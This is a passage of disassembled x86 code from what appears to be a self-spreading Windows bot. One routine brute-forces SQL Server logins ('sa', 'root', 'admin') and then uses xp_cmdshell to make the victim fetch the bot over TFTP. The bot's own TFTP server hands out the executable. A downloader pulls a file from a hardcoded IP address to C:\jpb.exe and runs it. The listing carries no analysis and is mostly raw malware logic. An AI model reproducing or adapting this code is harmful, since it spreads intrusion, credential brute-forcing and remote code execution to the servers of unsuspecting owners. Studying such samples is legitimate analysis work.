loc_41B6E5:				; CODE XREF: sub_41AFA7+751j
		call	sub_4039C3
		pop	ecx
		jmp	short loc_41B6C0
; ---------------------------------------------------------------------------

loc_41B6ED:				; CODE XREF: sub_41AFA7+53Dj
		push	[esp+8+arg_4]
		call	ds:dword_41D0D8	; CloseHandle
		push	esi
		jmp	short loc_41B6E5
; ---------------------------------------------------------------------------

loc_41B6FA:				; CODE XREF: sub_41AFA7+6F7j
		push	[esp+0Ch+arg_20]
		call	ds:dword_41D25C	; inet_ntoa
		push	eax
		mov	eax, [esp+10h+arg_1EC]
		imul	eax, 2Ch
		add	eax, offset dword_424528
		push	eax
		push	offset aSExploitedS_ ; "%s: Exploited: %s."
		lea	eax, [esp+18h+arg_EC]
		push	eax
		push	[esp+1Ch+arg_1F8]
		push	offset dword_427FFC
		call	sub_417B51
		mov	eax, [esp+24h+arg_1EC]
		imul	eax, 2Ch
		lea	eax, dword_42454C[eax]
		add	esp, 18h
		inc	dword ptr [eax]
		mov	al, [esp+13h]
		jmp	loc_41B6C2
sub_41AFA7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=0CD8h


sub_41B751	proc near		; DATA XREF: .data:0042457Co

var_D54		= dword	ptr -0D54h
var_D50		= dword	ptr -0D50h
var_D4C		= dword	ptr -0D4Ch
var_D48		= dword	ptr -0D48h
var_D44		= byte ptr -0D44h
var_D40		= dword	ptr -0D40h
var_D3C		= dword	ptr -0D3Ch
var_D38		= dword	ptr -0D38h
var_D34		= dword	ptr -0D34h
var_D30		= dword	ptr -0D30h
var_D2C		= dword	ptr -0D2Ch
var_D26		= byte ptr -0D26h
var_D25		= byte ptr -0D25h
var_D24		= byte ptr -0D24h
var_C24		= dword	ptr -0C24h
var_C20		= dword	ptr -0C20h
var_C1C		= dword	ptr -0C1Ch
var_C18		= dword	ptr -0C18h
var_C14		= byte ptr -0C14h
var_814		= byte ptr -814h
var_414		= byte ptr -414h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		lea	ebp, [esp-0CD8h]
		sub	esp, 0D54h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+0CD8h+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	44h
		pop	ecx
		xor	ebx, ebx
		xor	eax, eax
		mov	[ebp+0CD8h+var_14], bl
		lea	esi, [ebp+0CD8h+arg_0]
		lea	edi, [ebp+0CD8h+var_D24]
		rep movsd
		lea	edi, [ebp+0CD8h+var_13]
		stosd
		stosd
		stosd
		stosw
		stosb
		mov	eax, [ebp+0CD8h+var_C20]
		mov	[ebp+0CD8h+var_D40], eax
		lea	eax, [ebp+0CD8h+var_D34]
		push	eax
		push	ebx
		push	1
		mov	[ebp+0CD8h+var_D26], bl
		mov	[ebp+0CD8h+var_D54], offset aSa	; "sa"
		mov	[ebp+0CD8h+var_D50], offset aRoot ; "root"
		mov	[ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
		mov	[ebp+0CD8h+var_D48], ebx
		mov	[ebp+0CD8h+var_D25], bl
		mov	[ebp+0CD8h+var_D2C], ebx
		mov	[ebp+0CD8h+var_D30], ebx
		call	sub_4029EA
		test	ax, ax
		jz	short loc_41B7EB

loc_41B7D1:				; CODE XREF: sub_41B751+AEj
		xor	al, al

loc_41B7D3:				; CODE XREF: sub_41B751+CFj
		mov	ecx, [ebp+0CD8h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		add	ebp, 0CD8h
		leave
		retn
; ---------------------------------------------------------------------------

loc_41B7EB:				; CODE XREF: sub_41B751+7Ej
		push	0FFFFFFFAh
		push	3
		push	0C8h
		push	[ebp+0CD8h+var_D34]
		call	sub_4029DE
		test	ax, ax
		jnz	short loc_41B7D1
		lea	eax, [ebp+0CD8h+var_D2C]
		push	eax
		push	[ebp+0CD8h+var_D34]
		push	2
		call	sub_4029EA
		test	ax, ax
		jz	short loc_41B822

loc_41B814:				; CODE XREF: sub_41B751+22Bj
		push	[ebp+0CD8h+var_D34]
		push	1
		call	sub_4029F0
		mov	al, bl
		jmp	short loc_41B7D3
; ---------------------------------------------------------------------------

loc_41B822:				; CODE XREF: sub_41B751+C1j
		mov	edi, ds:dword_41D25C
		lea	ecx, [ebp+0CD8h+var_D54]
		mov	[ebp+0CD8h+var_D3C], ecx

loc_41B82E:				; CODE XREF: sub_41B751+1D0j
		cmp	off_425830, ebx
		mov	[ebp+0CD8h+var_D38], ebx
		jz	loc_41B916
		mov	esi, [ecx]
		mov	eax, offset off_425830

loc_41B844:				; CODE XREF: sub_41B751+16Bj
		lea	ecx, [ebp+0CD8h+var_D26]
		push	ecx
		push	dword ptr [eax]
		push	esi
		push	[ebp+0CD8h+var_C1C]
		push	[ebp+0CD8h+var_D40]
		call	edi	; inet_ntoa
		push	eax
		lea	eax, [ebp+0CD8h+var_414]
		push	offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
		push	eax
		call	sub_403475
		lea	eax, [ebp+0CD8h+var_414]
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_41B874:				; CODE XREF: sub_41B751+128j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41B874
		push	ebx
		sub	eax, ecx
		lea	ecx, [ebp+0CD8h+var_D44]
		push	ecx
		push	400h
		lea	ecx, [ebp+0CD8h+var_C14]
		push	ecx
		push	eax
		lea	eax, [ebp+0CD8h+var_414]
		push	eax
		push	ebx
		push	[ebp+0CD8h+var_D2C]
		call	sub_4029E4
		movzx	eax, ax
		cmp	ax, bx
		jz	short loc_41B8C0
		cmp	ax, 1
		jz	short loc_41B8C0
		inc	[ebp+0CD8h+var_D38]
		mov	eax, [ebp+0CD8h+var_D38]
		lea	eax, ds:425830h[eax*4]
		cmp	[eax], ebx
		jnz	short loc_41B844
		jmp	short loc_41B916
; ---------------------------------------------------------------------------

loc_41B8C0:				; CODE XREF: sub_41B751+154j
					; sub_41B751+15Aj
		lea	eax, [ebp+0CD8h+var_D30]
		push	eax
		push	[ebp+0CD8h+var_D2C]
		push	3
		call	sub_4029EA
		push	dword_427FFC
		lea	esi, [ebp+0CD8h+var_14]
		call	sub_4197B6
		mov	eax, esi
		push	eax
		lea	eax, [ebp+0CD8h+var_814]
		push	offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
		push	eax
		call	sub_403475
		add	esp, 10h
		push	0FFFFFFFDh
		lea	eax, [ebp+0CD8h+var_814]
		push	eax
		push	[ebp+0CD8h+var_D30]
		call	sub_4029F6
		test	ax, ax
		jz	short loc_41B929
		push	[ebp+0CD8h+var_D30]
		push	3
		call	sub_4029F0

loc_41B916:				; CODE XREF: sub_41B751+E6j
					; sub_41B751+16Dj
		mov	ecx, [ebp+0CD8h+var_D3C]
		add	ecx, 4
		cmp	[ecx], ebx
		mov	[ebp+0CD8h+var_D3C], ecx
		jnz	loc_41B82E
		jmp	short loc_41B96F
; ---------------------------------------------------------------------------

loc_41B929:				; CODE XREF: sub_41B751+1B9j
		push	[ebp+0CD8h+var_D40]
		mov	[ebp+0CD8h+var_D25], 1
		call	edi	; inet_ntoa
		push	eax
		mov	eax, [ebp+0CD8h+var_C24]
		imul	eax, 2Ch
		add	eax, offset dword_424528
		push	eax
		push	offset aSExploitedS__0 ; "%s: Exploited	%s."
		lea	eax, [ebp+0CD8h+var_D24]
		push	eax
		push	[ebp+0CD8h+var_C18]
		push	offset dword_427FFC
		call	sub_417B51
		mov	eax, [ebp+0CD8h+var_C24]
		imul	eax, 2Ch
		lea	eax, dword_42454C[eax]
		add	esp, 18h
		inc	dword ptr [eax]

loc_41B96F:				; CODE XREF: sub_41B751+1D6j
		push	[ebp+0CD8h+var_D2C]
		push	2
		call	sub_4029F0
		mov	bl, [ebp+0CD8h+var_D25]
		jmp	loc_41B814
sub_41B751	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41B981	proc near		; DATA XREF: sub_41BB83+15Ao

var_23C		= dword	ptr -23Ch
var_238		= dword	ptr -238h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= word ptr -224h
var_222		= word ptr -222h
var_220		= byte ptr -220h
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 240h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		jnz	short loc_41B9A7

loc_41B9A0:				; CODE XREF: sub_41B981+42j
					; sub_41B981+5Dj ...
		push	ebx
		call	ds:off_41D10C

loc_41B9A7:				; CODE XREF: sub_41B981+1Dj
		lea	edi, [ebp+var_18]
		movsd
		movsd
		push	11h
		movsd
		push	2
		push	2
		movsd
		call	ds:dword_41D220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_230], eax
		jz	short loc_41B9A0
		push	offset aRb	; "rb"
		push	offset dword_428028
		call	sub_4035B4
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		mov	[ebp+var_228], eax
		jz	short loc_41B9A0
		push	eax
		mov	[ebp+var_22C], ebx
		mov	[ebp+var_23C], 10h
		call	sub_403EB3
		test	eax, eax
		pop	ecx
		jnz	loc_41BAEF
		mov	esi, ds:dword_41D270

loc_41BA05:				; CODE XREF: sub_41B981+168j
		push	204h
		lea	eax, [ebp+var_224]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		xor	eax, eax
		inc	[ebp+var_22C]
		push	[ebp+var_22C]
		lea	edi, [ebp+var_238]
		stosd
		call	esi	; htons
		push	3
		mov	[ebp+var_222], ax
		call	esi	; htons
		push	[ebp+var_228]
		mov	[ebp+var_224], ax
		push	200h
		lea	eax, [ebp+var_220]
		push	1
		push	eax
		call	sub_40413F
		mov	edi, [ebp+var_230]
		add	esp, 10h
		push	10h
		lea	ecx, [ebp+var_18]
		push	ecx
		push	ebx
		add	eax, 4
		push	eax
		lea	eax, [ebp+var_224]
		push	eax
		push	edi
		call	ds:dword_41D248	; sendto
		cmp	eax, 0FFFFFFFFh
		jz	loc_41BB6B
		lea	eax, [ebp+var_23C]
		push	eax
		lea	eax, [ebp+var_18]
		push	eax
		push	ebx
		push	4
		lea	eax, [ebp+var_238]
		push	eax
		push	edi
		call	ds:dword_41D258	; recvfrom
		cmp	eax, 0FFFFFFFFh
		jz	loc_41BB6B
		push	[ebp+var_238]
		call	ds:dword_41D250	; htons
		cmp	ax, 4
		jnz	loc_41BB6B
		push	[ebp+var_238+2]
		call	ds:dword_41D250	; htons
		cmp	ax, word ptr [ebp+var_22C]
		jnz	loc_41BB6B
		push	[ebp+var_228]
		call	sub_403EB3
		test	eax, eax
		pop	ecx
		jz	loc_41BA05

loc_41BAEF:				; CODE XREF: sub_41B981+78j
		inc	dword_434F94
		push	100h
		call	sub_402A08
		mov	esi, eax
		push	esi
		call	sub_402E05
		push	eax
		mov	ebx, offset aNn	; "­­ÏÀÛÝ"
		call	sub_419EC1
		add	esp, 0Ch
		push	dword_434F94
		push	[ebp+var_14]
		call	ds:dword_41D25C	; inet_ntoa
		push	eax
		push	offset aTftpSendComple ; "TFTP:	Send Complete To %s. %d	Total Sen"...
		push	esi
		push	0
		push	offset dword_427FFC
		call	sub_417B51
		push	esi
		call	sub_402F5B
		add	esp, 1Ch
		push	[ebp+var_230]
		call	ds:dword_41D280	; closesocket
		push	[ebp+var_228]
		call	sub_403884
		pop	ecx
		mov	ecx, [ebp+var_8]
		pop	edi
		pop	esi
		xor	ecx, ebp
		xor	eax, eax
		pop	ebx
		call	sub_402AD0
		leave
		retn	4
; ---------------------------------------------------------------------------

loc_41BB6B:				; CODE XREF: sub_41B981+100j
					; sub_41B981+125j ...
		push	edi
		call	ds:dword_41D280	; closesocket
		push	[ebp+var_228]
		call	sub_403884
		pop	ecx
		jmp	loc_41B9A0
sub_41B981	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41BB83	proc near		; DATA XREF: sub_41BD26+53o

var_148		= dword	ptr -148h
var_144		= dword	ptr -144h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= byte ptr -138h
var_134		= dword	ptr -134h
var_120		= dword	ptr -120h
var_11C		= dword	ptr -11Ch
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 14Ch
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+14Ch+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	11h
		xor	esi, esi
		push	2
		inc	esi
		push	2
		mov	[esp+164h+var_140], esi
		call	ds:dword_41D220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	dword_428024, eax
		jnz	short loc_41BBCC
		xor	ebx, ebx

loc_41BBBF:				; CODE XREF: sub_41BB83+C1j
		mov	byte_434F8D, bl

loc_41BBC5:				; CODE XREF: sub_41BB83+BFj
		push	ebx
		call	ds:off_41D10C

loc_41BBCC:				; CODE XREF: sub_41BB83+38j
		push	4
		lea	ecx, [esp+15Ch+var_140]
		push	ecx
		push	4
		push	0FFFFh
		push	eax
		call	ds:dword_41D24C	; setsockopt
		xor	eax, eax
		lea	edi, [esp+158h+var_14]
		stosd
		stosd
		stosd
		stosd
		push	45h
		mov	[esp+15Ch+var_14], 2
		call	ds:dword_41D270	; htons
		mov	[esp+158h+var_12], ax
		push	10h
		lea	eax, [esp+15Ch+var_14]
		push	eax
		push	dword_428024
		xor	ebx, ebx
		mov	[esp+164h+var_10], ebx
		call	ds:dword_41D27C	; bind
		cmp	eax, 0FFFFFFFFh
		jnz	loc_41BCF5
		push	dword_428024
		call	ds:dword_41D280	; closesocket
		cmp	byte_434F8D, bl
		jz	short loc_41BBC5
		jmp	loc_41BBBF
; ---------------------------------------------------------------------------

loc_41BC49:				; CODE XREF: sub_41BB83+178j
		mov	eax, dword_428024
		mov	[esp+158h+var_11C], eax
		xor	eax, eax
		lea	edi, [esp+158h+var_148]
		stosd
		stosd
		lea	eax, [esp+158h+var_148]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [esp+164h+var_120]
		push	eax
		push	ebx
		mov	[esp+16Ch+var_120], esi
		mov	[esp+16Ch+var_148], 5
		mov	[esp+16Ch+var_144], ebx
		call	ds:dword_41D254	; select
		test	eax, eax
		jle	short loc_41BCF5
		xor	eax, eax
		lea	edi, [esp+158h+var_134]
		stosd
		stosd
		stosd
		stosd
		stosd
		lea	eax, [esp+158h+var_13C]
		push	eax
		lea	eax, [esp+15Ch+var_14]
		push	eax
		push	ebx
		push	14h
		lea	eax, [esp+168h+var_134]
		push	eax
		push	dword_428024
		mov	[esp+170h+var_13C], 10h
		call	ds:dword_41D258	; recvfrom
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41BCF5
		push	[esp+158h+var_134]
		inc	dword_434F90
		call	ds:dword_41D250	; htons
		cmp	ax, si
		jnz	short loc_41BCF5
		lea	eax, [esp+158h+var_138]
		push	eax
		push	ebx
		lea	eax, [esp+160h+var_14]
		push	eax
		push	offset sub_41B981
		push	ebx
		push	ebx
		call	ds:off_41D090
		push	3E8h
		call	ds:off_41D0F8

loc_41BCF5:				; CODE XREF: sub_41BB83+A7j
					; sub_41BB83+FCj ...
		cmp	byte_434F8D, bl
		jnz	loc_41BC49
		push	dword_428024
		call	ds:dword_41D280	; closesocket
		mov	ecx, [esp+158h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41BB83	endp


; =============== S U B	R O U T	I N E =======================================



sub_41BD26	proc near		; CODE XREF: sub_4022D6+5Ap
					; sub_41C28D+3EEp
		push	4
		mov	eax, offset loc_41C944
		call	sub_40497C
		xor	ebx, ebx
		cmp	byte_434F8D, bl
		jz	short loc_41BD40

loc_41BD3C:				; CODE XREF: sub_41BD26+74j
		mov	al, 1
		jmp	short loc_41BDA4
; ---------------------------------------------------------------------------

loc_41BD40:				; CODE XREF: sub_41BD26+14j
		mov	edi, 100h
		push	edi
		push	ebx
		mov	esi, offset dword_428028
		push	esi
		call	sub_407F20
		add	esp, 0Ch
		push	edi
		push	esi
		push	ebx
		call	ds:dword_41D0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41D060	; GetModuleFileNameA
		push	8
		call	sub_40340B
		mov	esi, eax
		pop	ecx
		mov	[ebp-10h], esi
		cmp	esi, ebx
		mov	[ebp-4], ebx
		jz	short loc_41BD8C
		push	offset sub_41BB83
		xor	ecx, ecx
		mov	edi, offset aTftpServer	; "TFTP	Server"
		call	sub_414884
		jmp	short loc_41BD8E
; ---------------------------------------------------------------------------

loc_41BD8C:				; CODE XREF: sub_41BD26+51j
		xor	eax, eax

loc_41BD8E:				; CODE XREF: sub_41BD26+64j
		cmp	[eax+4], ebx
		jz	short loc_41BD9C
		mov	byte_434F8D, 1
		jmp	short loc_41BD3C
; ---------------------------------------------------------------------------

loc_41BD9C:				; CODE XREF: sub_41BD26+6Bj
		mov	byte_434F8D, bl
		xor	al, al

loc_41BDA4:				; CODE XREF: sub_41BD26+18j
		call	sub_404A1B
		retn
sub_41BD26	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41BDAA	proc near		; CODE XREF: sub_40177B+6Cp
					; sub_4019F3+6Cp ...

var_3DC		= dword	ptr -3DCh
var_3D8		= byte ptr -3D8h
var_308		= byte ptr -308h
var_307		= byte ptr -307h
var_208		= byte ptr -208h
var_207		= byte ptr -207h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 3E0h
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+3E0h+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, 1FFh
		xor	ebx, ebx
		push	esi
		mov	[esp+3ECh+var_3DC], eax
		lea	eax, [esp+3ECh+var_207]
		push	ebx
		push	eax
		mov	[esp+3F4h+var_208], bl
		call	sub_407F20
		add	esp, 0Ch
		push	0FFh
		lea	eax, [esp+3ECh+var_307]
		push	ebx
		push	eax
		mov	[esp+3F4h+var_308], bl
		call	sub_407F20
		add	esp, 0Ch
		lea	eax, [esp+3E8h+var_3D8]
		call	sub_414B90
		push	[esp+3E8h+var_3DC]
		lea	eax, [esp+3ECh+var_208]
		push	offset aS_15	; "%s"
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [esp+3F8h+var_208]
		add	esp, 10h
		lea	esi, [eax+1]

loc_41BE37:				; CODE XREF: sub_41BDAA+92j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41BE37
		lea	ecx, [esp+3E8h+var_3D8]
		push	ecx
		sub	eax, esi
		push	eax
		lea	ecx, [esp+3F0h+var_208]
		call	sub_417450
		push	200h
		lea	eax, [esp+3F4h+var_208]
		push	ebx
		push	eax
		call	sub_407F20
		lea	eax, [esp+3FCh+var_308]
		add	esp, 14h
		push	eax
		lea	ebx, [esp+3ECh+var_3D8]
		call	sub_4172D0
		pop	ecx
		push	0C0h
		push	0
		push	edi
		call	sub_407F20
		add	esp, 0Ch
		xor	esi, esi

loc_41BE8C:				; CODE XREF: sub_41BDAA+114j
		movzx	eax, [esp+esi+3E8h+var_308]
		push	eax
		push	edi
		push	offset aSX	; "%s%X"
		push	0BFh
		push	edi
		call	sub_402EAE
		mov	eax, edi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41BEAE:				; CODE XREF: sub_41BDAA+109j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41BEAE
		sub	eax, ecx
		inc	esi
		cmp	esi, 40h
		mov	[eax+edi], dl
		jl	short loc_41BE8C
		mov	ecx, [esp+3E8h+var_4]
		pop	esi
		pop	ebx
		xor	ecx, esp
		mov	eax, edi
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn
sub_41BDAA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41BED6	proc near		; DATA XREF: sub_40177B+234o
					; sub_4019F3+1E6o ...

var_750		= dword	ptr -750h
var_74C		= dword	ptr -74Ch
var_748		= dword	ptr -748h
var_744		= dword	ptr -744h
var_740		= dword	ptr -740h
var_73C		= byte ptr -73Ch
var_738		= byte ptr -738h
var_638		= byte ptr -638h
var_615		= byte ptr -615h
var_515		= byte ptr -515h
var_415		= byte ptr -415h
var_414		= byte ptr -414h
var_413		= dword	ptr -413h
var_408		= byte ptr -408h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 754h
		mov	eax, dword_423064
		xor	eax, esp
		mov	[esp+754h+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		mov	ecx, 0C9h
		lea	edi, [esp+760h+var_738]
		rep movsd
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		movsw
		push	ebx
		push	offset aMozilla5_0 ; "Mozilla/5.0"
		movsb
		call	ds:dword_41D218	; InternetOpenA
		mov	esi, eax
		lea	eax, [esp+760h+var_515]
		push	eax
		lea	eax, [esp+764h+var_615]
		push	eax
		push	offset aDlDownloadingS ; "DL: Downloading %s to	%s"
		lea	eax, [esp+76Ch+var_738]
		push	eax
		push	[esp+770h+var_413]
		mov	edi, offset dword_427FFC
		push	edi
		call	sub_417B51
		add	esp, 18h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [esp+770h+var_615]
		push	eax
		push	esi
		call	ds:dword_41D214	; InternetOpenUrlA
		cmp	esi, ebx
		mov	[esp+760h+var_744], eax
		jz	loc_41C0F5
		cmp	eax, ebx
		jz	loc_41C0EE
		push	ebx
		push	ebx
		push	2
		push	ebx
		push	ebx
		push	40000000h
		lea	eax, [esp+778h+var_515]
		push	eax
		call	ds:dword_41D06C	; CreateFileA
		mov	[esp+760h+var_748], eax
		call	ds:dword_41D104	; GetTickCount
		mov	[esp+760h+var_740], eax
		mov	[esp+760h+var_750], ebx
		mov	esi, 400h

loc_41BF9D:				; CODE XREF: sub_41BED6+11Fj
		push	esi
		lea	eax, [esp+764h+var_408]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		lea	eax, [esp+760h+var_74C]
		push	eax
		push	esi
		lea	eax, [esp+768h+var_408]
		push	eax
		push	[esp+76Ch+var_744]
		call	ds:dword_41D210	; InternetReadFile
		push	ebx
		lea	eax, [esp+764h+var_73C]
		push	eax
		push	[esp+768h+var_74C]
		lea	eax, [esp+76Ch+var_408]
		push	eax
		push	[esp+770h+var_748]
		call	ds:dword_41D088	; WriteFile
		test	eax, eax
		jz	loc_41C0A0
		mov	eax, [esp+760h+var_74C]
		add	[esp+760h+var_750], eax
		cmp	eax, ebx
		ja	short loc_41BF9D
		call	ds:dword_41D104	; GetTickCount
		sub	eax, [esp+760h+var_740]
		xor	edx, edx
		mov	ecx, 3E8h
		div	ecx
		mov	ecx, eax
		cmp	ecx, ebx
		jnz	short loc_41C013
		xor	ecx, ecx
		inc	ecx

loc_41C013:				; CODE XREF: sub_41BED6+138j
		mov	eax, [esp+760h+var_750]
		xor	edx, edx
		div	ecx
		shr	eax, 0Ah
		push	eax
		push	ecx
		push	[esp+768h+var_750]
		lea	eax, [esp+76Ch+var_515]
		push	eax
		push	offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
		lea	eax, [esp+774h+var_738]
		push	eax
		push	[esp+778h+var_413]
		push	edi
		call	sub_417B51
		add	esp, 20h
		push	[esp+760h+var_748]
		call	ds:dword_41D0D8	; CloseHandle
		cmp	[esp+760h+var_415], 1
		jnz	loc_41C10F
		cmp	[esp+760h+var_414], bl
		lea	eax, [esp+760h+var_515]
		jz	short loc_41C0AE
		push	eax
		call	sub_419A09
		test	al, al
		pop	ecx
		lea	eax, [esp+760h+var_738]
		jz	short loc_41C0A7
		push	offset aMainUninstalli ; "Main:	Uninstalling Drone"
		push	eax
		push	[esp+768h+var_413]
		push	edi
		call	sub_417B51
		add	esp, 10h
		lea	eax, [esp+760h+var_638]
		push	eax
		call	sub_419C67

loc_41C0A0:				; CODE XREF: sub_41BED6+10Fj
		push	offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
		jmp	short loc_41C0FA
; ---------------------------------------------------------------------------

loc_41C0A7:				; CODE XREF: sub_41BED6+1A5j
		push	offset aDlFailedToUpda ; "DL: Failed To	Update"
		jmp	short loc_41C0FE
; ---------------------------------------------------------------------------

loc_41C0AE:				; CODE XREF: sub_41BED6+196j
		push	5
		push	ebx
		push	ebx
		push	eax
		push	offset byte_41EF1F
		push	ebx
		call	ds:dword_41D1E0
		test	eax, eax
		jnz	short loc_41C0CA
		push	offset aDlErrorExecuti ; "DL: Error Executing File."
		jmp	short loc_41C0FA
; ---------------------------------------------------------------------------

loc_41C0CA:				; CODE XREF: sub_41BED6+1EBj
		lea	eax, [esp+760h+var_515]
		push	eax
		push	offset aDlExecutedFile ; "DL: Executed File: %s"
		lea	eax, [esp+768h+var_738]
		push	eax
		push	[esp+76Ch+var_413]
		push	edi
		call	sub_417B51
		add	esp, 14h
		jmp	short loc_41C10F
; ---------------------------------------------------------------------------

loc_41C0EE:				; CODE XREF: sub_41BED6+91j
		push	offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
		jmp	short loc_41C0FA
; ---------------------------------------------------------------------------

loc_41C0F5:				; CODE XREF: sub_41BED6+89j
		push	offset aDlFailedWinine ; "DL: Failed; WinINET Error"

loc_41C0FA:				; CODE XREF: sub_41BED6+1CFj
					; sub_41BED6+1F2j ...
		lea	eax, [esp+764h+var_738]

loc_41C0FE:				; CODE XREF: sub_41BED6+1D6j
		push	eax
		push	[esp+768h+var_413]
		push	edi
		call	sub_417B51
		add	esp, 10h

loc_41C10F:				; CODE XREF: sub_41BED6+182j
					; sub_41BED6+216j
		call	ds:dword_41D0DC	; GetCurrentThreadId
		push	eax
		call	sub_41481B
		pop	ecx
		mov	ecx, [esp+760h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402AD0
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41BED6	endp


; =============== S U B	R O U T	I N E =======================================



sub_41C135	proc near		; CODE XREF: sub_41C28D+2C0p
		push	334h
		mov	eax, offset loc_41C9CC
		call	sub_4049E5
		push	327h
		xor	ebx, ebx
		lea	eax, [ebp-338h]
		push	ebx
		push	eax
		call	sub_407F20
		lea	eax, [ebp-338h]
		add	esp, 0Ch
		lea	edx, [eax+1]

loc_41C164:				; CODE XREF: sub_41C135+34j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C164
		sub	eax, edx
		mov	[ebp+eax-338h],	bl
		lea	eax, [ebp-238h]
		lea	esi, [eax+1]

loc_41C17D:				; CODE XREF: sub_41C135+4Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C17D
		sub	eax, esi
		push	offset aHttp217_67_229 ; "http://217.67.229.212/phpbb/uploads/jpb"...
		mov	[ebp+eax-238h],	bl
		mov	esi, 0FFh
		lea	eax, [ebp-215h]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-215h]
		add	esp, 0Ch
		lea	edi, [eax+1]

loc_41C1B0:				; CODE XREF: sub_41C135+80j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C1B0
		sub	eax, edi
		push	offset aCJpb_exe ; "C:\\jpb.exe"
		mov	[ebp+eax-215h],	bl
		lea	eax, [ebp-115h]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-115h]
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_41C1DE:				; CODE XREF: sub_41C135+AEj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41C1DE
		sub	eax, esi
		mov	[ebp+eax-115h],	bl
		push	8
		mov	byte ptr [ebp-12h], 1
		mov	[ebp-13h], bl
		mov	byte ptr [ebp-15h], 1
		mov	[ebp-14h], bl
		call	sub_40340B
		mov	esi, eax
		pop	ecx
		mov	[ebp-33Ch], esi
		cmp	esi, ebx
		mov	[ebp-4], ebx
		jz	short loc_41C228
		push	offset sub_41BED6
		lea	ecx, [ebp-338h]
		mov	edi, offset aDl	; "DL"
		call	sub_414884

loc_41C228:				; CODE XREF: sub_41C135+DCj
		call	sub_404A2F
		retn
sub_41C135	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41C22E	proc near		; CODE XREF: .text:0041CB30p
					; .text:0041CB4Cp ...

var_108		= dword	ptr -108h
var_104		= byte ptr -104h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 108h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	eax
		lea	eax, [ebp+var_104]
		push	100h
		push	eax
		mov	dword ptr [esi], offset	off_420B24
		mov	[ebp+var_108], esi
		call	sub_402EAE
		mov	eax, dword_435290
		add	esp, 0Ch
		lea	edx, [ebp+var_108]
		push	edx
		mov	ecx, offset dword_43528C
		push	eax
		push	ecx
		call	sub_40121E
